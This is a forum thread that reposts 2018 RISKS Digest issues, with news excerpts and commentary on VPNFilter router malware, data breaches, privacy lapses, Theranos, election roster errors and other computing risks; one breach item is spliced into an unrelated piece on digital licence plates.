    that "all SOHO router owners power cycle (reboot) their devices to
    temporarily disrupt the malware."

    As noted in the statements, rebooting serves the objectives of (1)
    temporarily preventing infected devices from running the stages that collect
    data and other advanced attacks and (2) helping FBI officials to track who
    was infected. Friday's statement said the FBI is working with the non-profit
    Shadow Foundation to disseminate the IP addresses of infected devices to
    ISPs and foreign authorities to notify end users.

    Authorities and researchers still don't know for certain how compromised
    devices are initially infected. They suspect the attackers exploited known
    vulnerabilities and default passwords that end users had yet to patch or
    change. That uncertainty is likely driving the advice in the FBI statement
    that all router and NAS users reboot, rather than only users of the 14
    models known to be affected by VPNFilter [...]

    ------------------------------

    Date: Sun, 27 May 2018 13:25:03 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Banks Adopt Military-Style Tactics to Fight Cybercrime (NYTimes)

    *The New York Times*

    ``Those are the decisions you don't want to be making for the first time
    during a real attack,'' said Bob Stasio, IBM's cyber range operations
    manager and a former operations chief for the National Security Agency's
    cyber center. One financial company's executive team did such a poor job of
    talking to its technical team during a past IBM training drill, Mr. Stasio
    said, that he went home and canceled his credit card with them.

    Like many cybersecurity bunkers, IBM's foxhole has deliberately theatrical
    touches. Whiteboards and giant monitors fill nearly every wall, with
    graphics that can be manipulated by touch.

    ``You can't have a fusion center unless you have really cool TVs,'' quipped
    Lawrence Zelvin, a former Homeland Security official who is now Citigroup's
    global cybersecurity head, at a recent cybercrime conference. ``It's even
    better if they do something when you touch them. It doesn't matter what
    they do. Just something.''

    Security pros mockingly refer to such eye candy as `pew pew' maps, an
    onomatopoeia for the noise of laser guns in 1980s movies and video
    arcades. They are especially useful, executives concede, to put on display
    when V.I.P.s or board members stop by for a tour. Two popular pew maps are
    from FireEye https://www.fireeye.com/cyber-map/threat-map.html and the
    defunct security vendor Norse http://www.norsecorp.com/ whose video
    game-like maps show laser beams zapping across the globe. Norse went out of
    business two years ago, and no one is sure what data
    <https://na01.safelinks.protection.outlook.com/ the map is based on, but
    everyone agrees that it looks cool.

    http://www.nytimes.com/2018/05/20/business/banks-cyber-security-military.html

    ------------------------------

    Date: Sun, 27 May 2018 16:26:44 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: How One Company Scammed Silicon Valley. And How It Got Caught.
    (John Carreyrou)

    BAD BLOOD
    John Carreyrou
    Secrets and Lies in a Silicon Valley Startup
    352 pp. Alfred A. Knopf. $27.95.
    *The New York Times* Book Review
    http://www.nytimes.com/2018/05/21/books/review/bad-blood-john-carreyro

    "Despite warnings from employees that Theranos wasn't ready to go live on
    human subjects -- its devices were likened to an eighth-grade science
    project -- Holmes was unwilling to disappoint investors or her commercial
    partners. The result was a fiasco. Samples were stored at incorrect
    temperatures. Patients got faulty results and were rushed to emergency
    rooms. People who called Theranos to complain were ignored; employees who
    questioned its technology, its quality control or its ethics were
    fired. Ultimately, nearly a million tests conducted in California and
    Arizona had to be voided or corrected."

    Investors and personalities enamored by technological wizardry, though based
    on fundamentally fraudulent solutions, were suckered in by Theranos' promise
    to revolutionize routine blood tests with a few tiny blood droplets from a
    pinprick. ~US$ 1B dropped on a real "unicorn" sighting.

    The Theranos founder, Elizabeth Holmes, preferred sycophants and colleagues
    who possessed 110-ohm noses (striped brown-brown-brown per the Resistor
    color code) that kissed her fanny. Findings and facts that disputed her
    vision were concealed from investors. Knowing how to ask the right questions
    remains a valuable skill to possess.

    When an ethical, professional engineer confronts a situation of this nature,
    there are few alternatives to pursue: (a) become a whistle-blower; (b)
    continue to document findings that support legal discovery and a fraud
    investigation while holding your nose and tongue; or, (c) jump ship at the
    earliest opportunity.

    If something appears too good to be true, it is likely the case.
    P.T. Barnum, the circus entrepreneur,is reputed to have said, "There's a
    sucker born every minute." An aphorism that remains prescient today for the
    incurious or greedy.

    ------------------------------

    Date: Sun, 27 May 2018 17:30:59 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Jaron Lanier: How Can We Repair The Mistakes Of The Digital Era? (NPR)

    https://www.npr.org/templates/transcript/transcript.php?storyId=6140792

    Get out your checkbook or boost your PayPal account balance. All the free
    services "enjoyed" today, that exploit volunteered information for a little
    dopamine, will shift to a subscription or micropayment model.

    The Internet as a true utility, like the water and power that comes out of
    the wall, billed per bit. Internet disenfranchisement is likely to evolve if
    meter ticks attributed to premium information become unaffordable.

    Will governments introduce a subsidy -- a new entitlement -- to boost the
    information "have-nots" into a realm approximating the "haves"? Or will there
    be a multi-tier model -- surrender your data for 24x7 tracking and attention
    whipsaw for free, versus pay for the right to volunteer data with an
    explicit opt-in (EU ePrivacy) granting license and viewing preferences as
    the product?

    ------------------------------

    Date: Mon, 28 May 2018 08:05:13 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: YouTube stars' fury over algorithm tests (BBC.com)

    http://www.bbc.com/news/technology-44279189

    'Originally, the YouTube subscription feed was a chronological list of
    videos from all the channels that a person had chosen to "subscribe"
    to. The system let people curate a personalised feed full of content from
    their favourite video-makers.

    'However, many video-makers have previously complained that some of their
    videos have not appeared in the subscription feed, and have questioned
    whether YouTube manipulates the list to boost viewer retention and
    advertising revenue.

    'YouTube's latest experiment -- which it said appeared for a "small number"
    of users -- changed the order of videos in the feed. Instead of showing the
    most recent videos at the top, YouTube said the manipulated feed showed
    people "the videos they want to watch".'

    Algorithmic refactoring experiment adjusts video delivery order.
    YouTube apparently 'wins' over content creator/copyright owners,
    despite subscription historical preference and profile settings.

    ------------------------------

    Date: Tue, 29 May 2018 16:10:52 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Amazon Toilet Paper Order of Over $7,000 Refunded 2 Months Later
    (Fortune)

    http://fortune.com/2018/05/25/woman-charged-7000-for-toilet-paper-ordered-amazon-refunded/

    The risk? Online/automated/robot cashiers. Same as my grocery store
    self-checkout charged me for 22 avocados instead of 2. At least I could get
    quick refund from on-scene humans.

    ------------------------------

    Date: Tue, 29 May 2018 17:14:58 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: Amazon's Echo privacy flub has big implications for IT (Evan Schuman)

    Evan Schuman, *Computerworld*, 26 May 2018
    https://www.computerworld.com/artic...privacy-flub-has-big-implications-for-it.html

    Amazon has confirmed that one of its Echo devices recorded a family's
    conversation and then messaged it to a random person on the family's contact
    list. The implications are terrifying.

    ------------------------------

    Date: Tue, 29 May 2018 17:34:18 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Bank of Montreal, CIBC's Simplii Financial report customer data
    breaches" (Asha McLean)

    Asha McLean, ZDNet, 29 May 2018
    http://www.zdnet.com/article/bank-o...lii-financial-confirm-customer-data-breaches/

    Bank of Montreal, CIBC's Simplii Financial report customer data breaches The
    Canadian banks have reported being contacted by external 'fraudsters'
    claiming to have accessed information on an estimated 90,000 customers. The
    trial appears to be limited to 24 plates.

    The plates are digital displays that can be updated and modified remotely.
    Therefore, they can be updated immediately once car registration is updated.
    They can also be used to "broadcast" messages such as emergency and amber
    alerts, and can be set to display personal messages when the car is not in
    motion.

    http://www.dailymail.co.uk/sciencet...l-license-plates-allow-police-track-move.html
    or https://is.gd/NRJ4Ey

    The plates also broadcast information to sensors in or beside roads, and can
    communicate with each other.

    I trust it is not too difficult to point out the huge numbers of ways these
    plates could be attacked or misused.

    Asha McLean, ZDNet, 1 Jun 2018
    CBA sent over 650 emails holding data on 10k customers in error. The bank
    has admitted discovering an issue with emails going to incorrect addresses.
    https://www.zdnet.com/article/cba-sent-over-650-emails-holding-data-on-10k-customers-in-error/

    opening text:

    The Commonwealth Bank of Australia (CBA) has once again found itself in the
    spotlight for the potential mishandling of customer information, admitting
    it had sent over 650 incorrectly addressed internal emails.

    The bank said on Friday it had completed an investigation that was initiated
    after a concern was raised about internal CBA emails being inadvertently
    sent to email addresses using the cba.com domain, prior to taking ownership
    of that domain in April 2017.

    Its usual email domain is cba.com.au.

    ------------------------------

    Date: Thu, 31 May 2018 07:21:49 +0800
    From: Jeremy Ardley <jer...@ardley.org>
    Subject: License Plate Risks

    Two different dynamically changeable number plates.

    The traditional:
    http://www.youtube.com/watch?v=wSFXyIlq5xw

    The $699 plus $7/month electronic paper version issued by the California
    Department of Motor Vehicles:


    I leave it as an exercise for the reader as to what risks exist in
    either. Asides that is from pointing out the stupidity of an electronic tag
    in the age of high quality Automatic Number Plate Recognition systems linked
    to a licensing computer.

    However, there is a second risk in being able to detect unlicensed vehicles;
    work overload. The Western Australian Police have had to turn off the
    unlicensed vehicle feature in their ANPR system because there are too many
    alerts!

    "WA Police 'can't cope' with high number of auto-detect car registration
    alerts"

    http://www.abc.net.au/news/2014-06-17/end-of-the-road-for-police-alert-software/5528160

    ------------------------------

    Date: Wed, 30 May 2018 18:37:19 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Jira bug exposed private server keys at major companies,
    researcher finds" (Zack Whittaker)

    Zack Whittaker, ZDNet, 30 May 2018
    https://www.zdnet.com/article/jira-...ver-keys-at-major-companies-researcher-finds/

    Jira bug exposed private server keys at major companies, researcher finds A
    major TV network, a UK cell giant, and one US government agency are among
    the companies affected.

    ------------------------------

    Date: Thu, 31 May 2018 19:39:42 -0400
    From: =?iso-8859-1?Q?Jos=E9_Mar=EDa?= Mateos <ch...@rinzewind.org>
    Subject: Google Started a Political Sh*tstorm Because of Its Over-Reliance
    on Wikipedia (Motherboard)

    https://motherboard.vice.com/en_us/article/435n9j/google-republicans-are-nazis-explanation

    As VICE News reported earlier Thursday, a Google search for `California
    Republican Party' resulted in Google listing `Nazism' as the ideology of the
    party. This happened because of Google's Featured Snippets tool, which pulls
    basic information for search terms and puts it on the front page. These are
    also sometimes called Google Cards and Knowledge Panels.

    The information on these cards is often taken from Wikipedia entries, which
    is what seems to have happened here. Six days ago, someone edited the
    Wikipedia page for `California Republican Party' to include `Nazism',
    something that wasn't changed until Wednesday, Wikipedia's edit logs show.

    You take content from another site and put it into yours and pretend it's
    "the truth", and all that is an automated process. Can't see what might go
    wrong there.

    ------------------------------

    Date: Fri, 01 Jun 2018 15:36:42 -0700
    From: RICHARD M STEIN <rms...@ieee.org>
    Subject: Signs of sophisticated cellphone spying found near White House,
    U.S. officials say (WaPo)

    https://www.washingtonpost.com/news...use-say-u-s-officials/?utm_term=.3cff9618ae33

    "A federal study found signs that surveillance devices for intercepting
    cellphone calls and texts were operating near the White House and other
    sensitive locations in the Washington area last year."

    Only Rip Van Winkle would have been surprised by this headline. What
    precautions are the SIGINT targets using to forestall intercept? Are
    they effective, or have they been compromised too? Whatever happened to
    good ol' "Blackbag" jobs?

    ------------------------------

    Date: Fri, 1 Jun 2018 14:04:19 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Massive Visa Outage Shows the Fragility of Global Payments (WiReD)

    NNSquad
    https://www.wired.com/story/visa-outage-shows-the-fragility-of-global-payments/

    On Friday, VISA'S payment network suffered outages across Europe, limiting
    transactions for both businesses and individuals. Banks and commerce
    groups began advising customers to use cash or other payment cards if
    possible, and reports indicated that online and contactless transactions
    were having more success than chip cards. Though some Visa transactions
    still went through, the failure appeared widespread. The Financial Times
    even reported that some ATMs in the United Kingdom were already out of
    cash within a couple of hours of the first outage reports. Some observers
    saw in the outage a stark reminder of the fragility of payment networks,
    and the weaknesses in global economic platforms.

    ------------------------------

    Date: Sat, 2 Jun 2018 02:01:55 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: How can criminals manipulate cryptocurrency markets?
    (The Conversation)

    https://theconversation.com/how-can-criminals-manipulate-cryptocurrency-markets-97294

    ------------------------------

    Date: Fri, 25 May 2018 18:32:06 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Ad Blocker Ghostery Celebrates GDPR Day by Revealing Hundreds
    of User Email Addresses (Gizmodo)

    via NNSquad [Thanks, EU!]
    http://gizmodo.com/ad-blocker-ghostery-celebrates-gdpr-day-by-revealing-hu-1826338313

    Ad-blocking tool Ghostery suffered from a pretty impressive,
    self-inflicted screwup Friday when the privacy-minded company accidentally
    CCed hundreds of its users in an email, revealing their addresses to all
    recipients. Fittingly, the inadvertent data exposure came in the form of
    an email updating Ghostery users about the company's data collection
    policies. The ad blocker was sending out the message to affirm its
    commitment to user privacy as the European Union's digital privacy law,
    known as the General Data Protection Regulation (GDPR), goes into effect.
    The email arrived in inboxes with the subject line "Happy GDPR Day --
    We've got you covered!" In the body of the email, the company informed
    users, "We at Ghostery hold ourselves to a high standard when it comes to
    users' privacy, and have implemented measures to reinforce security and
    ensure compliance with all aspects of this new legislation."

    ------------------------------

    Date: Sun, 27 May 2018 13:30:02 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Commentary: GDPR Misses the Point (Fortune)

    http://fortune.com/2018/05/24/gdpr-data-privacy-cookies/

    ------------------------------

    Date: Sun, 3 Jun 2018 12:08:40 -0700
    From: Rob Slade" <rms...@shaw.ca>
    Subject: GDPR, Privacy, and CISSPforum vs "Community"

    The long running CISSPforum mailing list on Yahoo Groups is being closed by
    ISC2, effective June 15, 2018. An alternate mailing list, run by volunteer
    CISSPs, has been created on groups.io.

    Yeah, I know. Those of you who don't have the CISSP cert don't care. (Even
    those who, like Peter, have been given an honorary CISSP may not care.) But
    the reason the CISSPforum is being closed is kind of interesting.

    ISC2 itself isn't saying much about why. But most people discussing it seem
    to think it has to do with GDPR. Yahoo has not had the greatest success
    with security, so ISC2 may wish to limit it's exposure.

    The thing is, if I want to give people instructions on getting to the new
    CISSPforum, the easiest thing would be to send them to the page at
    https://community.isc2.org/t5/Welcome/CISSPforum-replacement/td-p/11006 (or
    https://is.gd/lGXNgT if email mungs that and you want a shortened version).
    Yes, you are correct. That Web page is one of the postings on the new,
    supposedly private, "community" that ISC2 has created to replace the
    CISSPforum mailing list as a communications venue for the membership.

    And, if I want to send you to the existing discussion of the various privacy
    issues to do with the new "community," I can point you to
    https://community.isc2.org/t5/Welco...censorship-Closing-of-CISSP/td-p/11021/page/2
    or http://is.gd/GgHckH Or, you can search for it yourself, on Google:
    http://lmgtfy.com/?q=see+the+amazing+dancing+CISSPs+and+all+their+discussions

    You will be able to see all kinds of discussion on the new forum. Do a
    Google search with any term you want, and include site:community.isc2.org as
    a term, and see what the amazing dancing CISSPs have said about it. (There
    is one area of the "community" that is not searchable, but it's fairly
    small.)

    ------------------------------

    Date: Sun, 3 Jun 2018 19:24:04 -0400
    From: =?iso-8859-1?Q?Jos=E9_Mar=EDa?= Mateos <ch...@rinzewind.org>
    Subject: German spy agency can keep tabs on Internet hubs: court (Phys)

    http://phys.org/news/2018-05-german-spy-agency-tabs-internet.html

    De-Cix, the world's largest Internet hub, says Germany's spy agency is able
    to get a complete and unfiltered copy of the all data passing through its
    fibre optic cables

    Germany's spy agency can monitor major Internet hubs if Berlin deems it
    necessary for strategic security interests, a federal court has ruled.

    In a ruling late on Wednesday, the Federal Administrative Court threw out a
    challenge by the world's largest Internet hub, the De-Cix exchange, against
    the tapping of its data flows by the BND foreign intelligence service.

    The operator had argued the agency was breaking the law by capturing German
    domestic communications along with international data.

    http://rinzewind.org/blog-es

    ------------------------------

    Date: Sat, 26 May 2018 13:02:30 -0400
    From: John Ohno <john...@gmail.com>
    Subject: Trendism and cognitive stagnation

    Originally posted here:


    Trendism & cognitive stagnation

    (This is a follow-up to Against Trendism
    )

    Basing visibility on popularity is a uniquely awful version of *tyrrany of
    the majority* because uncommon views become invisible, even if, were they to
    start on an even playing field, they would become popular.

    In this way, it encourages mental stasis: since ranking is based on an
    immediate appraisal of how popular something already is, and visibility is
    based therefore on past shallow popularity, there's no room for
    rumination.

    This is NOT an attribute of `technology' or `social media', but an attribute
    of visibility systems based on immediate ranking. Visibility systems based
    on ranking delayed by, say, three days, or with the top 25% most popular
    posts elided, would be fine.

    Our capacity to imagine new possibilities is based largely on our
    familiarity with the bounds of possibility space -- we can only
    imagine views that are in the neighborhood of views we've heard
    expressed in the past. So, making the already-unpopular invisible limits
    imagination.

    (There are hacks we can use to make it possible to imagine views nobody has
    ever held. We can make random juxtapositions, impose meaning on them, and
    then figure out a justification for them -- like tarot reading. Or,
    we can merely iterate from some basic idea, getting more and more extreme,
    while internalizing the perspective of each iteration as something someone
    could possibly believe in good faith. The former -- the bibliomancy
    approach -- is common in experimental art, while the latter is
    typical of dystopian science fiction.

    But, these hacks are pretty limited. We need a starting place. If
    we've only heard mainstream ideas, we're going to have a
    hard time going off the beaten path with the dystopia approach, while we
    will struggle with the bibliomancy approach because most ideas can only be
    made to seem reasonable with the help of other ideas. Getting into uncharted
    territories with either of these approaches is difficult unless
    you've already filled out the middle of your possibility space with
    other ideas, because in their absence you would need to independently
    reinvent them.)

    This is not a justification, in of itself, for banning metrics entirely.
    After all, this kind of exponential distribution happens with ideas even
    without the use of popularity signifiers: ideas spread, and popular ideas
    have more opportunities to spread. Trendism merely accelerates the process
    and widens the gap between the most popular ideas and everything else.

    Sites like reddit use segmentation to prevent total ordering of popularity
    from dominating, although this ultimately means that popular subreddits have
    a disproportionate impact on this total ordering when it is seen.
    http://redditp.com/r/all

    Similarly, we have seen piecemeal attempts to limit the effects of trendism
    for particular topics -- the curation of trending topics at twitter and
    facebook, for instance, or ad-hoc ranking demerits for particular tags on
    lobste.rs.

    However, we could be applying the measurements we already take to counteract
    trendism rather than accelerating it: making popularity count less the
    higher it gets, removing overly-popular content entirely, boosting the
    visibility of mostly-unseen content, using information about organic reach
    in sites like twitter to boost the synthetic reach of people who
    don't have many followers (instead of boosting the synthetic reach
    of the rich), systematically demoting posts that comment on trending topics,
    spotlighting spotify tracks and youtube videos with zero views, and so on.

    Where trendism devalues the function of recommendation systems as novelty
    aggregators, these tools could be modified to be anti-trendist, pro-novelty,
    and promote a cosmopolitanism that broadens our horizons in ways traditional
    word-of-mouth never could. This is a unique capacity of recommendation
    systems over curators: recommendation systems can recommend things nobody
    has ever seen, and can recommend them on the grounds that nobody has seen
    them.

    ------------------------------

    Date: Mon, 28 May 2018 09:38:16 +0300
    From: Amos Shapir <amo...@gmail.com>
    Subject: Re: Securing Elections

    I don't wish to start a political argument, but from a practical POV, there
    is merit to the US method of "the winner takes it all" -- eventually, one
    candidate wins, and incumbents should be let to do their job to the best of
    their ability. Compare that to relational methods in some European
    countries, which have brought about unstable governments which are
    reshuffled often (like in France before the 1968, or current Italy).

    History has proven -- from the resign of Nixon to the recent upheaval in
    Armenia -- that as long as freedom of expression and assembly are kept, the
    public would eventually be able to express enough dissent to get rid of
    corrupt politicians, no matter which system was used to elect them in the
    first place.

    ------------------------------

    Date: Tue, 5 May 2018 11:11:11 -0800
    From: RISKS-...@csl.sri.com
    Subject: Abridged info on RISKS (comp.risks)

    The ACM RISKS Forum is a MODERATED digest. Its Usenet manifestation is
    comp.risks, the feed for which is donated by panix.com as of June 2011.
    => SUBSCRIPTIONS: The mailman Web interface can be used directly to
    subscribe and unsubscribe:
    http://mls.csl.sri.com/mailman/listinfo/risks

    => SUBMISSIONS: to ri...@CSL.sri.com with meaningful SUBJECT: line that
    includes the string `notsp'. Otherwise your message may not be read.
    *** This attention-string has never changed, but might if spammers use it.
    => SPAM challenge-responses will not be honored. Instead, use an alternative
    address from which you never send mail where the address becomes public!
    => The complete INFO file (submissions, default disclaimers, archive sites,
    copyright policy, etc.) is online.
    <http://www.CSL.sri.com/risksinfo.html>
    *** Contributors are assumed to have read the full info file for guidelines!
    => OFFICIAL ARCHIVES: http://www.risks.org takes you to Lindsay Marshall's
    searchable html archive at newcastle:
    http://catless.ncl.ac.uk/Risks/VL.IS --> VoLume, ISsue.
    Also, ftp://ftp.sri.com/risks for the current volume
    or ftp://ftp.sri.com/VL/risks-VL.IS for previous VoLume
    If none of those work for you, the most recent issue is always at
    http://www.csl.sri.com/users/risko/risks.txt, and index at /risks-30.00
    Lindsay has also added to the Newcastle catless site a palmtop version
    of the most recent RISKS issue and a WAP version that works for many but
    not all telephones: http://catless.ncl.ac.uk/w/r
    ALTERNATIVE ARCHIVES: http://seclists.org/risks/ (only since mid-2001)
    <http://the.wiretapped.net/security/info/textfiles/risks-digest/>
    *** NOTE: If a cited URL fails, we do not try to update them. Try
    browsing on the keywords in the subject line or cited article leads.
    Apologies for what Office365 and SafeLinks have done to URLs. I have
    tried to extract the essence.
    ==> Special Offer to Join ACM for readers of the ACM RISKS Forum:
    <http://www.acm.org/joinacm1>

    ------------------------------

    End of RISKS-FORUM Digest 30.71
    ************************
  6. LakeGator

    LakeGator Mostly Harmless Moderator VIP Member

    Joined:
    Apr 3, 2007
    Messages:
    4,340
    Likes Received:
    300
    Trophy Points:
    258
    Location:
    Tampa
    Ratings Received:
    +2,180
    Risks Digest 30.72

    RISKS List Owner

    Jun 12, 2018 8:07 PM

    Posted in group: comp.risks

    RISKS-LIST: Risks-Forum Digest Tuesday 12 June 2018 Volume 30 : Issue 72

    ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
    Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

    ***** See last item for further information, disclaimers, caveats, etc. *****
    This issue is archived at <The Risks Digest> as
    <The Risks Digest>
    The current issue can also be found at
    <http://www.csl.sri.com/users/risko/risks.txt>

    Contents:
    Another risk of driverless cars (PGN)
    Emirates looks to windowless planes (bbc.com)
    180,000 Voters accidentally left off LA County polling place rosters
    (Irfan Khan)
    Ontario election results Not a Number (Tony Marmic)
    Florida skips gun background checks for a year after employee forgets login
    (Naked Security)
    All accredited journalists at the #KimTrumpSummit get a free USB fan
    (YCombinator)
    Israelis nabbed in Philippines are tip of iceberg in alleged fraud
    gone global (The Times of Israel)
    Sweden Tries to Halt Its March to Total Cashlessness (Bloomberg)
    Cryptocurrencies Lose Billions In Value After An Exchange Is Hacked
    "Cryptocurrency theft malware is now an economy worth millions" (NPR)
    Quebec Halts Bitcoin Mining Power Requests Amid Booming Demand
    (Charlie Osborne)
    The Spanish Liga uses the phone microphone of millions of fans
    to spy on bars (El Diario)
    Navy Contractor Hacked: Reams of Secret Documents Taken (WashPo)
    G Suite leaks in 10,000+ orgs: Google UX blamed, fury at no-bug defense
    (TechBeacon)
    "Password reset flaw at Internet giant Frontier allowed account takeovers"
    (Zack Whittaker)
    Why a DNA data breach is much worse than a credit card leak (The Verge)
    "Facebook gave some companies extended access to user data"
    (Stephanie Condon)
    Facebook bug made up to 14 million users' posts public for days (WiReD)
    "Cisco fixes critical bug that exposed networks to hackers"
    (Zack Whittaker)
    "Meet Norman, the world's first 'psychopathic' AI" (Charlie Osborne)
    Should We Always Trust What We See in Satellite Images?
    (Scientific American)
    The NSA Just Released 136 Historical Propaganda Posters (Motherboard)
    Unproven facial-recognition companies target schools, promising an
    end to shootings (WashPo)
    The Zip Slip vulnerability: what you need to know (Naked Security)
    All the people Apple just pissed off to better protect your privacy
    (Fast Company)
    Recounting 'Horror Stories' Over Guitar Center's Warranties (NYT)
    Add Bryan Colangelo to the long list who have been burned by social media
    *ESPN)
    Microsoft, Github, & distributed revision control (Medium)
    How the body could power pacemakers and other implantable devices
    (Charles Q. Choi)
    Having better risk-based analysis for your banks and credit cards
    (David Strom, Phil Smith III)
    Re: Securing Elections (Chris Drewe)
    Abridged info on RISKS (comp.risks)

    ----------------------------------------------------------------------

    Date: Mon, 11 Jun 2018 9:27:18 PDT
    From: "Peter G. Neumann" <neu...@csl.sri.com>
    Subject: Another risk of driverless cars

    NPR reported today that Waymo is buying a slew of cars to create a
    driverless taxi fleet with no human overseer required in the car. Emergency
    takeover would be done by a fleet of well-trained remote admin personnel,
    *via cell phone*.

    There seem to be some massive flaws in that reasoning. One is the need for
    real-time response. Another is unavailable cell-phone coverage.

    I recall the case of someone who used his cellphone to start his car at
    home, and then drove into Red Rock Canyon Park, parked, and later tried to
    start his car (with the presence of his cellphone). Unfortunately, he had
    left his wireless unlocking/starting dongle at home, and there was no cell
    coverage in the canyon. His wife climbed up out of the canyon, called a
    neighbor who could get the remote dongle out of their house, and bring it to
    them so that they could drive home.

    Just one more example of short-sightedness and lack of awareness...

    ------------------------------

    Date: Wed, 06 Jun 2018 19:44:30 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Emirates looks to windowless planes (bbc.com)



    Aviation safety expert Professor Graham Braithwaite of Cranfield University:

    ``Cabin crew need to be able to see outside the aircraft if there is an
    emergency. Being able to see outside the aircraft in an emergency is
    important, especially if an emergency evacuation has to take place. Flight
    attendants would need to check outside the aircraft in an emergency, for
    example for fire, before opening a door and commencing an evacuation - and
    anything that needed power to do this may not be easy to get certified by
    an aviation safety regulator.'' Prof Braithwaite said the main obstacle
    in a windowless aircraft would be passenger perceptions of the
    technology.

    However, aviation regulator the European Aviation Safety Agency said: "We
    do not see any specific challenge that could not be overcome to ensure a
    level of safety equivalent to the one of an aircraft fitted with cabin
    windows.

    In addition to emergency evacuation slides, perhaps an emergency "peep hole"
    to supplement camera or screen failure?

    [Perhaps the pilots would not need windows either, because everything is
    computer controlled? PGN]

    ------------------------------

    Date: Wed, 6 Jun 2018 5:50:18 PDT
    From: "Peter G. Neumann" <neu...@csl.sri.com>
    Subject: 180,000 Voters accidentally left off LA County polling place rosters
    (Irfan Khan)

    (Irfan Khan / Los Angeles Times)
    Mercado de Los Angeles in Boyle Heights on Tuesday.
    Poll worker Shannon Diaz puts up signs as voting begins at El Mercado de
    Los Angeles in Boyle Heights on Tuesday.

    If you are a registered voter in Los Angeles County and poll workers say
    they can't find your name on the roster at the polling place when you go to
    vote, don't worry -- you can still cast a provisional ballot.

    Some Angelenos needed a bit of reassurance that their votes would be counted
    in Tuesday's primary election after 118,522 voters' names were accidentally
    left off rosters due to a printing error, according to L.A. County
    Registrar Dean C. Logan.

    About 2.3% of L.A. County's 5.1 million registered voters and 35% of the
    county's 4,357 precincts were affected by the error, according to figures
    provided by the registrar-recorder/county clerk's office, which was still
    trying to determine the reason for the printing error. Voters whose names
    are missing are being encouraged to file provisional ballots, which are
    verified by vote counters later.

    118,522 voters accidentally left off Los Angeles County polling place rosters

    ------------------------------

    Date: Fri, 8 Jun 2018 16:42:48 -0400
    From: Tony Harminc <thar...@gmail.com>
    Subject: Ontario election results Not a Number

    Early in the counting for the Ontario provincial election on Thursday
    evening 2018-06-07, I noticed the CBC election site displayed this dynamic
    table of popular vote numbers:

    Party Votes Vote Share
    PC 389,435 40.45%
    NDP 333,475 34.63%
    LIB 174,446 18.12%
    GRN 48,022 4.99%
    OTH 17,467 NaN%

    The "NaN%" survived several on-the-fly updates to the numbers.

    When I checked on Friday morning, with final results in, the table was

    Party Votes Vote Share
    PC 2,322,422 40.63%
    NDP 1,925,574 33.69%
    LIB 1,103,283 19.30%
    GRN 263,987 4.62%
    OTH 100,058 1.75%

    It's not obvious to me why the first set of numbers should lead to a NaN for
    the "OTH" parties vote share rather than 1.81%. The page is still there at
    Ontario Election Results From CBC News if anyone cares to
    investigate the code, but I don't know how long it'll last. One trusts that
    this code is purely for display on the CBC website, and has nothing to do
    with actual vote tallying...

    In passing, this election was conducted with paper ballots hand marked and
    scanned by machine, with the ballots retained for hand recount if necessary,
    so pretty much Best Practice as I understand it. I don't believe any such
    recount has been called for.

    ------------------------------

    Date: Tue, 12 Jun 2018 11:52:23 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Florida skips gun background checks for a year after employee
    forgets login (Naked Security)

    In Florida, the site of recent mass shootings such as at the Stoneman
    Douglas High School and the Pulse nightclub, more than a year went by in
    which the state approved applications without carrying out background
    checks. This meant the state was unaware if there was a cause to refuse a
    licence to allow somebody to carry a hidden gun -- for example, mental
    illness or drug addiction.

    The reason is dismayingly banal: an employee couldn't remember her login.

    Florida skips gun background checks for a year after employee forgets login

    ------------------------------

    Date: Mon, 11 Jun 2018 16:04:31 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: All accredited journalists at the #KimTrumpSummit get a free USB fan
    (YCombinator)

    [Nothing to worry about!]
    https://news.ycombinator.com/item?id=17285062

    Oh yeah. Just plug it into your computer. For sure.

    ------------------------------

    Date: Tue, 12 Jun 2018 13:01:51 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Israelis nabbed in Philippines are tip of iceberg in alleged fraud
    gone global (The Times of Israel)

    As police raid Israeli-operated boiler rooms in Asia and Eastern Europe,
    local law enforcement has yet to indict a single operative from an industry
    that has stolen billions

    Israelis nabbed in Philippines are tip of iceberg in alleged fraud gone global

    ------------------------------

    Date: Mon, 11 Jun 2018 17:53:32 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Sweden Tries to Halt Its March to Total Cashlessness (Bloomberg)

    via NNSquad
    Sweden Tries to Halt Its March to Total Cashlessness

    The move is a response to Sweden's rapid transformation as it becomes one
    of the most cashless societies in the world. That's led to concerns that
    some people are finding it increasingly difficult to cope without access
    to mobile phones or bank cards. There are also fears around what would
    happen if the digital payments systems suddenly crashed.

    ------------------------------

    Date: Mon, 11 Jun 2018 21:59:28 PDT
    From: "Peter G. Neumann" <neu...@csl.sri.com>
    Subject: Cryptocurrencies Lose Billions In Value After An Exchange Is Hacked
    (NPR)

    Coinrail virtual currency exchange was breached, and lost only $40M.
    Ethereum dropped, and the end result was an estimated $40B lost over the
    weekend to cryptocurrencies overall. (PGN-ed)
    https://www.npr.org/2018/06/11/6189...billions-in-value-after-an-exchange-is-hacked

    ------------------------------

    Date: Fri, 08 Jun 2018 20:23:45 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Cryptocurrency theft malware is now an economy worth millions"
    (Charlie Osborne)

    Charlie Osborne for Zero Day (7 Jun 2018)
    Carbon Black research suggests that as interest in cryptocurrency rises,
    so does the market for weapons to steal it.
    https://www.zdnet.com/article/cryptocurrency-theft-malware-is-now-an-economy-worth-millions/

    selected text:

    The researchers estimate that over the past six months alone, a total of
